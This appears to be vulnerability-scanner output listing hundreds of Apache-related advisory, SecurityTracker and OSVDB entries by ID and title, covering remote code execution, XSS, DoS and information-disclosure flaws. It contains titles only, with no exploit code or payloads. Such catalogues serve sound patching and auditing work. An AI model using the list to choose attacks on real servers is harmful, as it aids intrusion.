| [55355] FreeBSD Ports: apache
| [55284] Debian Security Advisory DSA 807-1 (libapache-mod-ssl)
| [55261] Debian Security Advisory DSA 805-1 (apache2)
| [55259] Debian Security Advisory DSA 803-1 (apache)
| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
| [54439] FreeBSD Ports: apache
| [53931] Slackware Advisory SSA:2004-133-01 apache
| [53903] Slackware Advisory SSA:2004-299-01 apache, mod_ssl, php
| [53902] Slackware Advisory SSA:2004-305-01 apache+mod_ssl
| [53878] Slackware Advisory SSA:2003-308-01 apache security update
| [53851] Debian Security Advisory DSA 135-1 (libapache-mod-ssl)
| [53849] Debian Security Advisory DSA 132-1 (apache-ssl)
| [53848] Debian Security Advisory DSA 131-1 (apache)
| [53784] Debian Security Advisory DSA 021-1 (apache)
| [53738] Debian Security Advisory DSA 195-1 (apache-perl)
| [53737] Debian Security Advisory DSA 188-1 (apache-ssl)
| [53735] Debian Security Advisory DSA 187-1 (apache)
| [53703] Debian Security Advisory DSA 532-1 (libapache-mod-ssl)
| [53577] Debian Security Advisory DSA 120-1 (libapache-mod-ssl, apache-ssl)
| [53568] Debian Security Advisory DSA 067-1 (apache,apache-ssl)
| [53519] Debian Security Advisory DSA 689-1 (libapache-mod-python)
| [53433] Debian Security Advisory DSA 181-1 (libapache-mod-ssl)
| [53282] Debian Security Advisory DSA 594-1 (apache)
| [53248] Debian Security Advisory DSA 558-1 (libapache-mod-dav)
| [53224] Debian Security Advisory DSA 532-2 (libapache-mod-ssl)
| [53215] Debian Security Advisory DSA 525-1 (apache)
| [53151] Debian Security Advisory DSA 452-1 (libapache-mod-python)
| [52529] FreeBSD Ports: apache+ssl
| [52501] FreeBSD Ports: apache
| [52461] FreeBSD Ports: apache
| [52390] FreeBSD Ports: apache
| [52389] FreeBSD Ports: apache
| [52388] FreeBSD Ports: apache
| [52383] FreeBSD Ports: apache
| [52339] FreeBSD Ports: apache+mod_ssl
| [52331] FreeBSD Ports: apache
| [52329] FreeBSD Ports: ru-apache+mod_ssl
| [52314] FreeBSD Ports: apache
| [52310] FreeBSD Ports: apache
| [15588] Detect Apache HTTPS
| [15555] Apache mod_proxy content-length buffer overflow
| [15554] Apache mod_include priviledge escalation
| [14771] Apache <= 1.3.33 htpasswd local overflow
| [14177] Apache mod_access rule bypass
| [13644] Apache mod_rootme Backdoor
| [12293] Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities
| [12280] Apache Connection Blocking Denial of Service
| [12239] Apache Error Log Escape Sequence Injection
| [12123] Apache Tomcat source.jsp malformed request information disclosure
| [12085] Apache Tomcat servlet/JSP container default files
| [11438] Apache Tomcat Directory Listing and File disclosure
| [11204] Apache Tomcat Default Accounts
| [11092] Apache 2.0.39 Win32 directory traversal
| [11046] Apache Tomcat TroubleShooter Servlet Installed
| [11042] Apache Tomcat DOS Device Name XSS
| [11041] Apache Tomcat /servlet Cross Site Scripting
| [10938] Apache Remote Command Execution via .bat files
| [10839] PHP.EXE / Apache Win32 Arbitrary File Reading Vulnerability
| [10773] MacOS X Finder reveals contents of Apache Web files
| [10766] Apache UserDir Sensitive Information Disclosure
| [10756] MacOS X Finder reveals contents of Apache Web directories
| [10752] Apache Auth Module SQL Insertion Attack
| [10704] Apache Directory Listing
| [10678] Apache /server-info accessible
| [10677] Apache /server-status accessible
| [10440] Check for Apache Multiple / vulnerability
|
| SecurityTracker - https://www.securitytracker.com:
| [1028865] Apache Struts Bugs Permit Remote Code Execution and URL Redirection Attacks
| [1028864] Apache Struts Wildcard Matching and Expression Evaluation Bugs Let Remote Users Execute Arbitrary Code
| [1028824] Apache mod_dav_svn URI Processing Flaw Lets Remote Users Deny Service
| [1028823] Apache Unspecified Flaw in mod_session_dbd Has Unspecified Impact
| [1028724] (HP Issues Fix for HP-UX) Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
| [1028722] (Red Hat Issues Fix for JBoss) Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
| [1028693] (Red Hat Issues Fix) Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
| [1028622] Apache Struts 'includeParams' Bugs Permit Remote Command Execution and Cross-Site Scripting Attacks
| [1028621] Apache Subversion Bugs Let Remote Authenticated Users Execute Arbitrary Commands and Deny Service
| [1028540] Apache mod_rewrite Input Validation Flaw Lets Remote Users Execute Arbitrary Commands
| [1028534] Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
| [1028533] Apache Tomcat Lack of Chunked Transfer Encoding Extension Size Limit Lets Remote Users Deny Service
| [1028532] Apache Tomcat AsyncListeners Bug May Disclose Information from One Request to Another User
| [1028515] Apache VCL Input Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
| [1028457] Apache ActiveMQ Bugs Let Remote Users Conduct Cross-Site Scripting Attacks, Deny Service, and Obtain Potentially Sensitive Information
| [1028287] Apache CXF WSS4JInInterceptor Grants Service Access to Remote Users
| [1028286] Apache CXF WS-Security UsernameToken Processing Flaw Lets Remote Users Bypass Authentication
| [1028252] Apache Commons FileUpload Unsafe Temporary File Lets Local Users Gain Elevated Privileges
| [1028207] Apache Input Validation Bugs Permit Cross-Site Scripting Attacks
| [1027836] Apache Tomcat Connection Processing Bug Lets Remote Users Deny Service
| [1027834] Apache Tomcat Bug Lets Remote Users Bypass Cross-Site Request Forgery Prevention Filter
| [1027833] Apache Tomcat Bug Lets Remote Users Bypass Security Constraints
| [1027729] Apache Tomcat Header Processing Bug Lets Remote Users Deny Service
| [1027728] Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
| [1027554] Apache CXF Lets Remote Authenticated Users Execute Unauthorized SOAP Actions
| [1027508] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
| [1027421] Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
| [1027096] Apache Commons Compress BZip2CompressorOutputStream() Sorting Algorithm Lets Remote or Local Users Deny Service
| [1026932] Apache LD_LIBRARY_PATH Processing Lets Local Users Gain Elevated Privileges
| [1026928] Apache OFBiz Unspecified Flaw Lets Remote Users Execute Arbitrary Code
| [1026927] Apache OFBiz Input Validation Flaws Permit Cross-Site Scripting Attacks
| [1026847] Apache Traffic Server Host Header Processing Flaw Lets Remote Users Deny Service
| [1026846] Apache Wicket Discloses Hidden Application Files to Remote Users
| [1026839] Apache Wicket Input Validation Flaw in 'wicket:pageMapName' Parameter Permits Cross-Site Scripting Attacks
| [1026616] Apache Bugs Let Remote Users Deny Service and Obtain Cookie Data
| [1026575] Apache Struts ParameterInterceptor() Flaw Lets Remote Users Execute Arbitrary Commands
| [1026484] Apache Struts Bug Lets Remote Users Overwrite Files and Execute Arbitrary Code
| [1026477] Apache Tomcat Hash Table Collision Bug Lets Remote Users Deny Service
| [1026402] Apache Struts Conversion Error Lets Remote Users Inject Arbitrary Commands
| [1026353] Apache mod_proxy/mod_rewrite Bug Lets Remote Users Access Internal Servers
| [1026295] Apache Tomcat Lets Untrusted Web Applications Gain Elevated Privileges
| [1026267] Apache .htaccess File Integer Overflow Lets Local Users Execute Arbitrary Code
| [1026144] Apache mod_proxy Pattern Matching Bug Lets Remote Users Access Internal Servers
| [1026095] Apache Tomcat HTTP DIGEST Authentication Weaknesses Let Remote Users Conduct Bypass Attacks
| [1026054] Apache mod_proxy_ajp HTTP Processing Error Lets Remote Users Deny Service
| [1025993] Apache Tomcat AJP Protocol Processing Bug Lets Remote Users Bypass Authentication or Obtain Information
| [1025976] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
| [1025960] Apache httpd Byterange Filter Processing Error Lets Remote Users Deny Service
| [1025925] Apache Tomcat Commons Daemon jsvc Lets Local Users Gain Elevated Privileges
| [1025924] Apache Tomcat XML Validation Flaw Lets Applications Obtain Potentially Sensitive Information
| [1025788] Apache Tomcat Lets Malicious Applications Obtain Information and Deny Service
| [1025755] Apache Santuario Buffer Overflow Lets Remote Users Deny Service
| [1025712] Apache Tomcat Discloses Passwords to Local Users in Certain Cases
| [1025577] Apache Archiva Input Validation Hole Permits Cross-Site Scripting Attacks
| [1025576] Apache Archiva Request Validation Flaw Permits Cross-Site Request Forgery Attacks
| [1025527] Apache APR Library apr_fnmatch() Flaw Lets Remote Users Execute Arbitrary Code
| [1025303] Apache Tomcat HTTP BIO Connector Error Discloses Information From Different Requests to Remote Users
| [1025215] Apache Tomcat May Ignore @ServletSecurity Annotation Protections
| [1025066] Apache Continuum Input Validation Flaw Permits Cross-Site Request Forgery Attacks
| [1025065] Apache Continuum Input Validation Hole Permits Cross-Site Scripting Attacks
| [1025027] Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
| [1025026] Apache Tomcat Manager Input Validation Hole Permits Cross-Site Scripting Attacks
| [1025025] Apache Tomcat Security Manager Lets Local Users Bypass File Permissions
| [1024764] Apache Tomcat Manager Input Validation Hole in 'sessionList.jsp' Permits Cross-Site Scripting Attacks
| [1024417] Apache Traffic Server Insufficient Randomization Lets Remote Users Poison the DNS Cache
| [1024332] Apache mod_cache and mod_dav Request Processing Flaw Lets Remote Users Deny Service
| [1024180] Apache Tomcat 'Transfer-Encoding' Header Processing Flaw Lets Remote Users Deny Service and Obtain Potentially Sensitive Information
| [1024096] Apache mod_proxy_http May Return Results for a Different Request
| [1023942] Apache mod_proxy_ajp Error Condition Lets Remote Users Deny Service
| [1023941] Apache ap_read_request() Memory Error May Let Remote Users Access Potentially Sensitive Information
| [1023778] Apache ActiveMQ Input Validation Flaw Permits Cross-Site Scripting Attacks
| [1023701] Apache mod_isapi Error Processing Flaw May Let Remote Users Deny Service
| [1023533] Apache mod_proxy Integer Overflow May Let Remote Users Execute Arbitrary Code
| [1022988] Apache Solaris Support Code Bug Lets Remote Users Deny Service
| [1022529] Apache mod_deflate Connection State Bug Lets Remote Users Deny Service
| [1022509] Apache mod_proxy stream_reqbody_cl() Infinite Loop Lets Remote Users Deny Service
| [1022296] Apache IncludesNoExec Options Restrictions Can Be Bypass By Local Users
| [1022264] Apache mod_proxy_ajp Bug May Disclose Another User's Response Data
| [1022001] Apache Tomcat mod_jk May Disclose Responses to the Wrong User
| [1021988] mod_perl Input Validation Flaw in Apache::Status and Apache2::Status Permits Cross-Site Scripting Attacks
| [1021350] NetWare Bug Lets Remote Users Access the ApacheAdmin Console
| [1020635] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
| [1020520] Oracle WebLogic Apache Connector Lets Remote Users Execute Arbitrary Code
| [1020267] Apache mod_proxy Interim Response Process Bug Lets Remote Users Deny Service
| [1019784] Apache-SSL Certificate Processing Bug May Let Remote Users View Portions of Kernel Memory
| [1019256] Apache mod_negotiation Input Validation Hole Permits Cross-Site Scripting Attacks
| [1019194] Apache Input Validation Hole in Mod_AutoIndex When the Character Set is Undefined May Permit Cross-Site Scripting Attacks
| [1019185] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
| [1019154] Apache Input Validation Hole in mod_status Permits Cross-Site Scripting Attacks
| [1019093] Apache Input Validation Hole in mod_imap Permits Cross-Site Scripting Attacks
| [1019030] Apache Input Validation Hole in Default HTTP 413 Error Page Permits Cross-Site Scripting Attacks
| [1018633] Apache mod_proxy Bug Lets Remote Users Deny Service
| [1018304] Apache HTTPD scoreboard Protection Flaw Lets Local Users Terminate Arbitrary Processes
| [1018303] Apache HTTPD mod_cache May Let Remote Users Deny Service
| [1018302] Apache mod_status Input Validation Hole Permits Cross-Site Scripting Attacks
| [1018269] Apache Tomcat Input Validation Hole in Processing Accept-Language Header Permits Cross-Site Scripting Attacks
| [1017904] Apache suEXEC Bugs May Let Local Users Gain Elevated Privileges
| [1017719] Apache Tomcat JK Web Server Connector Buffer Overflow in map_uri_to_worker() Lets Remote Users Execute Arbitrary Code
| [1017062] Apache mod_tcl Format String Bug in set_var() Function May Let Remote Users Execute Arbitrary Code
| [1016601] Apache mod_rewrite Off-by-one Error Lets Remote Users Execute Arbitrary Code
| [1016576] Apache Tomcat Discloses Directory Listings to Remote Users
| [1015447] Apache mod_ssl Null Pointer Dereference May Let Remote Users Deny Service
| [1015344] Apache mod_imap Input Validation Flaw in Referer Field Lets Remote Users Conduct Cross-Site Scripting Attacks
| [1015093] Apache Memory Leak in MPM 'worker.c' Code May Let Remote Users Deny Service
| [1014996] ApacheTop Unsafe Temporary File May Let Local Users Gain Elevated Privileges
| [1014833] Apache ssl_hook_Access() Function May Fail to Verify Client Certificates
| [1014826] Apache Memory Leak in 'byterange filter' Lets Remote Users Deny Service
| [1014575] Apache mod_ssl Off-by-one Buffer Overflow in Processing CRLs May Let Remote Users Deny Service
| [1014323] Apache Chunked Transfer-Encoding and Content-Length Processing Lets Remote Users Smuggle HTTP Requests
| [1013156] Apache mod_python Publisher Handler Discloses Information to Remote Users
| [1012829] Apache mod_auth_radius radcpy() Integer Overflow Lets Remote Users Deny Service in Certain Cases
| [1012416] Apache on Apple OS X Lets Remote Users Bypass Apache File Handlers and Directly Access Files
| [1012415] Apache on Apple HFS+ Filesystems May Disclose '.DS_Store' Files to Remote Users
| [1012414] Apache mod_digest_apple Lets Remote Users Replay Authentication Credentials
| [1012083] Apache Web Server Error in Processing Requests With Many Space Characters Lets Remote Users Deny Service
| [1011783] Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
| [1011557] Apache mod_ssl SSLCipherSuite Directive Can By Bypassed in Certain Cases
| [1011385] Apache Satsify Directive Error May Let Remote Users Access Restricted Resources
| [1011340] Apache SSL Connection Abort State Error Lets Remote Users Deny Service
| [1011303] Apache ap_resolve_env() Buffer Overflow in Reading Configuration Files May Let Local Users Gain Elevated Privileges
| [1011299] Apache IPv6 Address Parsing Flaw May Let Remote Users Deny Service
| [1011248] Apache mod_dav LOCK Method Error May Let Remote Users Deny Service
| [1011213] Apache mod_ssl Can Be Crashed By Remote Users When Reverse Proxying SSL Connections
| [1010674] Apache Can Be Crashed By PHP Code Invoking Nested Remote Sockets
| [1010599] Apache httpd Header Line Memory Allocation Lets Remote Users Crash the Server
| [1010462] Apache mod_proxy Buffer Overflow May Let Remote Users Execute Arbitrary Code
| [1010322] Apache mod_ssl Stack Overflow in ssl_util_uuencode_binary() May Let Remote Users Execute Arbitrary Code
| [1010270] cPanel Apache mod_phpsuexec Options Let Local Users Gain Elevated Privileges
| [1009934] Apache Web Server Has Buffer Overflow in ebcdic2ascii() on Older Processor Architectures
| [1009516] Apache mod_survey HTML Report Format Lets Remote Users Conduct Cross-Site Scripting Attacks
| [1009509] Apache mod_disk_cache Stores Authentication Credentials on Disk
| [1009495] Apache Web Server Socket Starvation Flaw May Let Remote Users Deny Service
| [1009417] GroupWise WebAccess With Apache on NetWare Has Configuration Flaw That May Grant Web Access to Remote Users
| [1009338] Apache mod_access Parsing Flaw May Fail to Enforce Allow/Deny Rules
| [1009337] Apache mod_ssl Memory Leak Lets Remote Users Crash the Daemon
| [1009182] Apache for Cygwin '..%5C' Input Validation Flaw Discloses Files to Remote Users
| [1008973] PHP May Apply Incorrect php_admin_* Settings To Requests for Apache Virtual Hosts
| [1008967] Apache-SSL 'SSLFakeBasicAuth' Lets Remote Users Forge Client Certificates to Be Authenticated
| [1008920] Apache mod_digest May Validate Replayed Client Responses
| [1008828] Apache mod_python String Processing Bug Still Lets Remote Users Crash the Web Server
| [1008822] Apache mod_perl File Descriptor Leak May Let Local Users Hijack the http and https Services
| [1008675] mod_auth_shadow Apache Module Authenticates Expired Passwords
| [1008559] Apache mod_php File Descriptor Leak May Let Local Users Hijack the https Service
| [1008335] Apache mod_python String Processing Bug Lets Remote Users Crash the Web Server
| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
| [1008030] Apache mod_rewrite Contains a Buffer Overflow
| [1008029] Apache mod_alias Contains a Buffer Overflow
| [1008028] Apache mod_cgid May Disclose CGI Output to Another Client
| [1007995] Apache Cocoon Forms May Let Remote Users Execute Arbitrary Java Code on the System
| [1007993] Apache Cocoon 'view-source' Sample Script Discloses Files to Remote Users
| [1007823] Apache Web Server mod_cgi Error May Let Malicious CGI Scripts Crash the Web Service
| [1007664] Apache::Gallery Unsafe Temporary Files May Let Local Users Gain Apache Web Server Privileges
| [1007557] Apache Web Server Does Not Filter Terminal Escape Sequences From Log Files
| [1007230] Apache HTTP Server 'rotatelogs' Bug on Win32 and OS/2 May Cause the Logging to Stop
| [1007146] Apache HTTP Server FTP Proxy Bug May Cause Denial of Service Conditions
| [1007145] Apache 'accept()' Errors May Cause Denial of Service Conditions
| [1007144] Apache Web Server 'type-map' File Error Permits Local Denial of Service Attacks
| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
| [1006864] Apache Web Server Can Be Crashed By Remote Users Via mod_dav Flaws and Also Via Basic Authentication
| [1006709] Apache mod_survey Input Validation Flaw Lets Remote Users Fill Up Disk Space
| [1006614] Apache mod_ntlm Buffer Overflow and Format String Flaw Let Remote Users Execute Arbitary Code
| [1006591] Apache mod_access_referer Module Null Pointer Dereference May Faciliate Denial of Service Attacks
| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
| [1006021] Apache Tomcat Server URL Parsing Error May Disclose Otherwise Inaccessible Web Directory Listings and Files to Remote Users
| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
| [1005962] Apache Web Server Path Parsing Flaw May Allow Remote Users to Execute Code in Certain Configurations
| [1005848] Apache 'printenv' Script Input Validation Bugs in Older Versions May Let Remote Users Conduct Cross-Site Scripting Attacks
| [1005765] Apache mod_jk Module Processing Bug When Used With Tomcat May Disclose Information to Remote Users or Crash
| [1005548] Apache mod_php Module May Allow Local Users to Gain Control of the Web Port
| [1005499] Apache Web Server (2.0.42) May Disclose CGI Source Code to Remote Users When Used With WebDAV
| [1005410] Apache Tomcat Java Servlet Engine Can Be Crashed Via Multiple Requests for DOS Device Names
| [1005351] Apache Web Server (1.3.x) Shared Memory Scoreboard Bug Lets Certain Local Users Issue Signals With Root Privileges
| [1005331] Apache Web Server (2.x) SSI Server Signature Filtering Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
| [1005290] Apache Tomcat Java Server Default Servlet Returns JSP Source Code to Remote Users
| [1005285] Apache Web Server 'mod_dav' Has Null Pointer Bug That May Allow Remote Users to Cause Denial of Service Conditions
| [1005010] Apache Web Server (2.0) Has Unspecified Flaw That Allows Remote Users to Obtain Sensitive Data and Cause Denial of Service Conditions
| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
| [1004745] Apache Tomcat Java Server Allows Cross-Site Scripting Attacks
| [1004636] Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
| [1004602] Apache Tomcat Java Server for Windows Can Be Crashed By Remote Users Sending Malicious Requests to Hang All Available Working Threads
| [1004586] Apache Tomcat Java Server May Disclose the Installation Path to Remote Users
| [1004555] Apache Web Server Chunked Encoding Flaw May Let Remote Users Execute Arbitrary Code on the Server
| [1004209] Apache 'mod_python' Python Language Interpreter Bug in Publisher Handler May Allow Remote Users to Modify Files on the System
| [1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System
| [1003767] 'mod_frontpage' Module for Apache Web Server Has Buffer Overlow in 'fpexec.c' That Allows Remote Users to Execute Arbitrary Code on the System with Root Privileges
| [1003723] Apache-SSL for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
| [1003664] 'mod_ssl' Security Package for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
| [1003602] GNUJSP Java Server Pages Implementation Discloses Web Files and Source Code to Remote Users and Bypasses Apache Access Control Restrictions
| [1003465] PHP for Apache Web Server May Disclose Installation Path Information to Remote Users Making 'OPTIONS' Requests
| [1003451] Oracle Application Server PL/SQL Module for Apache Has Buffer Overflows That Allow Remote Users to Execute Arbitrary Code and Gain Access to the Server
| [1003131] Apache Web Server in Virtual Hosting Mode Can Be Crashed By a Local User Removing a Log Directory
| [1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error
| [1003008] Apache 'mod_bf' Module Lets Remote Users Execute Arbitrary Code
| [1002629] Apache suEXEC Wrapper Fails to Observe Minimum Group ID Security Settings in Certain Situations
| [1002542] Apache Web Server Virtual Hosting Split-Logfile Function Lets Remote Users Write Log Entries to Arbitrary Files on the System
| [1002400] Apache mod_gzip Module Has Buffer Overflow That Can Be Exploited By Local Users to Gain Elevated Privileges
| [1002303] Several 3rd Party Apache Authentication Modules Allow Remote Users to Execute Arbitrary Code to Gain Access to the System or Execute Stored Procedures to Obtain Arbitrary Database Information
| [1002188] Apache Web Server Discloses Internal IP Addresses to Remote Users in Certain Configurations
| [1001989] Apache Web Server May Disclose Directory Contents Even If an Index.html File is Present in the Directory
| [1001719] Apache Web Server on Mac OS X Client Fails to Enforce File and Directory Access Protections, Giving Remote Users Access to Restricted Pages
| [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server
| [1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application
| [1001083] Apache Web Server May Display Directory Index Listings Even if Directory Listings Are Disabled
|
| OSVDB - http://www.osvdb.org:
| [96078] Apache CloudStack Infrastructure Menu Setup Network Multiple Field XSS
| [96077] Apache CloudStack Global Settings Multiple Field XSS
| [96076] Apache CloudStack Instances Menu Display Name Field XSS
| [96075] Apache CloudStack Instances Menu Add Instances Network Name Field XSS
| [96074] Apache CloudStack Instances Menu Add Instances Review Step Multiple Field XSS
| [96031] Apache HTTP Server suEXEC Symlink Arbitrary File Access
| [95888] Apache Archiva Single / Double Quote Character Handling XSS Weakness
| [95885] Apache Subversion mod_dav_svn Module Crafted HTTP Request Handling Remote DoS
| [95706] Apache OpenOffice.org (OOo) OOXML Document File XML Element Handling Memory Corruption
| [95704] Apache OpenOffice.org (OOo) DOC File PLCF Data Handling Memory Corruption
| [95603] Apache Continuum web/util/GenerateRecipentNotifier.java recipient Parameter XSS
| [95602] Apache Continuum web/action/notifier/JabberProjectNotifierEditAction-jabberProjectNotifierSave-validation.xml Multiple Parameter XSS
| [95601] Apache Continuum web/action/notifier/JabberGroupNotifierEditAction-jabberProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
| [95600] Apache Continuum web/action/ScheduleAction-saveSchedule-validation.xml Multiple Parameter XSS
| [95599] Apache Continuumweb/action/BuildDefinitionAction-saveBuildDefinition-validation.xml Multiple Parameter XSS
| [95598] Apache Continuum web/action/AddProjectAction-addProject-validation.xml Multiple Parameter XSS
| [95597] Apache Continuum web/action/ProjectEditAction-projectSave-validation.xml Multiple Parameter XSS
| [95596] Apache Continuum web/action/notifier/IrcGroupNotifierEditAction-ircProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
| [95595] Apache Continuum web/action/notifier/IrcProjectNotifierEditAction-ircProjectNotifierSave-validation.xml Multiple Parameter XSS
| [95594] Apache Continuum web/action/ProjectGroupAction.java Multiple Parameter XSS
| [95593] Apache Continuum web/action/AddProjectGroupAction.java Multiple Parameter XSS
| [95592] Apache Continuum web/action/AddProjectAction.java Multiple Parameter XSS
| [95523] Apache OFBiz Webtools Application View Log Screen Unspecified XSS
| [95522] Apache OFBiz Nested Expression Evaluation Arbitrary UEL Function Execution
| [95521] Apache HTTP Server mod_session_dbd Session Saving Unspecified Issue
| [95498] Apache HTTP Server mod_dav.c Crafted MERGE Request Remote DoS
| [95406] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Arbitrary Site Redirect
| [95405] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Remote Code Execution
| [95011] Apache CXF XML Parser SOAP Message Handling CPU Resource Exhaustion Remote DoS
| [94705] Apache Geronimo RMI Classloader Exposure Serialized Object Handling Remote Code Execution
| [94651] Apache Santuario (XML Security for C++) XML Signature CanonicalizationMethod Parameter Spoofing Weakness
| [94636] Apache Continuum workingCopy.action userDirectory Traversal Arbitrary File Access
| [94635] Apache Maven SCM SvnCommandlineUtils Process Listing Local Password Disclosure
| [94632] Apache Maven Wagon SSH (wagon-ssh) Host Verification Failure MitM Weakness
| [94625] Apache Santuario (XML Security for C++) XML Signature Reference Crafted XPointer Expression Handling Heap Buffer Overflow
| [94618] Apache Archiva /archiva/security/useredit.action username Parameter XSS
| [94617] Apache Archiva /archiva/security/roleedit.action name Parameter XSS
| [94616] Apache Archiva /archiva/security/userlist!show.action roleName Parameter XSS
| [94615] Apache Archiva /archiva/deleteArtifact!doDelete.action groupId Parameter XSS
| [94614] Apache Archiva /archiva/admin/addLegacyArtifactPath!commit.action legacyArtifactPath.path Parameter XSS
| [94613] Apache Archiva /archiva/admin/addRepository.action Multiple Parameter XSS
| [94612] Apache Archiva /archiva/admin/editAppearance.action Multiple Parameter XSS
| [94611] Apache Archiva /archiva/admin/addLegacyArtifactPath.action Multiple Parameter XSS
| [94610] Apache Archiva /archiva/admin/addNetworkProxy.action Multiple Parameter XSS
| [94403] Apache Santuario (XML Security for C++) InclusiveNamespace PrefixList Processing Heap Overflow
| [94402] Apache Santuario (XML Security for C++) HMAC-based XML Signature Processing DoS
| [94401] Apache Santuario (XML Security for C++) XPointer Evaluation Stack Overflow
| [94400] Apache Santuario (XML Security for C++) HMAC-Based XML Signature Reference Element Validation Spoofing Weakness
| [94279] Apache Qpid CA Certificate Validation Bypass
| [94275] Apache Solr JettySolrRunner.java Can Not Find Error Message XSS
| [94233] Apache OpenJPA Object Deserialization Arbitrary Executable Creation
| [94042] Apache Axis JAX-WS Java Unspecified Exposure
| [93969] Apache Struts OGNL Expression Handling Double Evaluation Error Remote Command Execution
| [93796] Apache Subversion Filename Handling FSFS Repository Corruption Remote DoS
| [93795] Apache Subversion svnserve Server Aborted Connection Message Handling Remote DoS
| [93794] Apache Subversion contrib/hook-scripts/check-mime-type.pl svnlook Hyphenated argv Argument Handling Remote DoS
| [93793] Apache Subversion contrib/hook-scripts/svn-keyword-check.pl Filename Handling Remote Command Execution
| [93646] Apache Struts Crafted Parameter Arbitrary OGNL Code Execution
| [93645] Apache Struts URL / Anchor Tag includeParams Attribute Remote Command Execution
| [93636] Apache Pig Multiple Physical Operator Memory Exhaustion Remote Remote DoS
| [93635] Apache Wink DTD (Document Type Definition) Expansion Data Parsing Information Disclosure
| [93605] RT Apache::Session::File Session Replay Reuse Information Disclosure
| [93599] Apache Derby SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY Boot Password Manipulation Re-encryption Failure Password Corruption
| [93555] Apache Commons Codec Invalid Base32 String Information Tunneling Weakness
| [93554] Apache HBase bulkLoadHFiles() Method ACL Bypass
| [93543] JBoss Enterprise Application Platform org.apache.catalina.connector.Response.encodeURL() Method MitM jsessionid Disclosure
| [93542] Apache ManifoldCF (Connectors Framework) org.apache.manifoldcf.crawler.ExportConfiguration Class Configuration Export Password Disclosure
| [93541] Apache Solr json.wrf Callback XSS
| [93524] Apache Hadoop GetSecurityDescriptorControl() Function Absolute Security Descriptor Handling NULL Descriptor Weakness
| [93521] Apache jUDDI Security API Token Session Persistence Weakness
| [93520] Apache CloudStack Default SSL Key Weakness
| [93519] Apache Shindig /ifr Cross-site Arbitrary Gadget Invocation
| [93518] Apache Solr /admin/analysis.jsp name Parameter XSS
| [93517] Apache CloudStack setup-cloud-management /etc/sudoers Modification Local Privilege Escalation
| [93516] Apache CXF UsernameTokenInterceptor Nonce Caching Replay Weakness
| [93515] Apache HBase table.jsp name Parameter XSS
| [93514] Apache CloudStack Management Server Unauthenticated Remote JMX Connection Default Setting Weakness
| [93463] Apache Struts EL / OGNL Interpretation Unspecified Remote Code Execution
| [93462] Apache CXF WS-SecurityPolicy AlgorithmSuite Arbitrary Ciphertext Decryption Weakness
| [93401] Apache Hadoop core-site.xml Permission Weakness Local Alfredo Secret Disclosure
| [93400] Apache Hadoop Map/Reduce Job Log Directory Symlink Arbitrary File Mode Manipulation
| [93397] Apache Wicket Referrer HTTP Header Session ID Disclosure
| [93366] Apache HTTP Server modules/mappers/mod_rewrite.c do_rewritelog() Function Log File Terminal Escape Sequence Filtering Remote Command Execution
| [93254] Apache Tomcat AsyncListener Method Cross-session Information Disclosure
| [93253] Apache Tomcat Chunked Transfer Encoding Data Saturation Remote DoS
| [93252] Apache Tomcat FORM Authenticator Session Fixation
11624| [93172] Apache Camel camel/endpoints/ Endpoint XSS
11625| [93171] Apache Sling HtmlResponse Error Message XSS
11626| [93170] Apache Directory DelegatingAuthenticator MitM Spoofing Weakness
11627| [93169] Apache Wave AuthenticationServlet.java Session Fixation Weakness
11628| [93168] Apache Click ErrorReport.java id Parameter XSS
11629| [93167] Apache ActiveMQ JMSXUserId Spoofing Weakness
11630| [93166] Apache CXF Crafted Message Element Count Handling System Resource Exhaustion Remote DoS
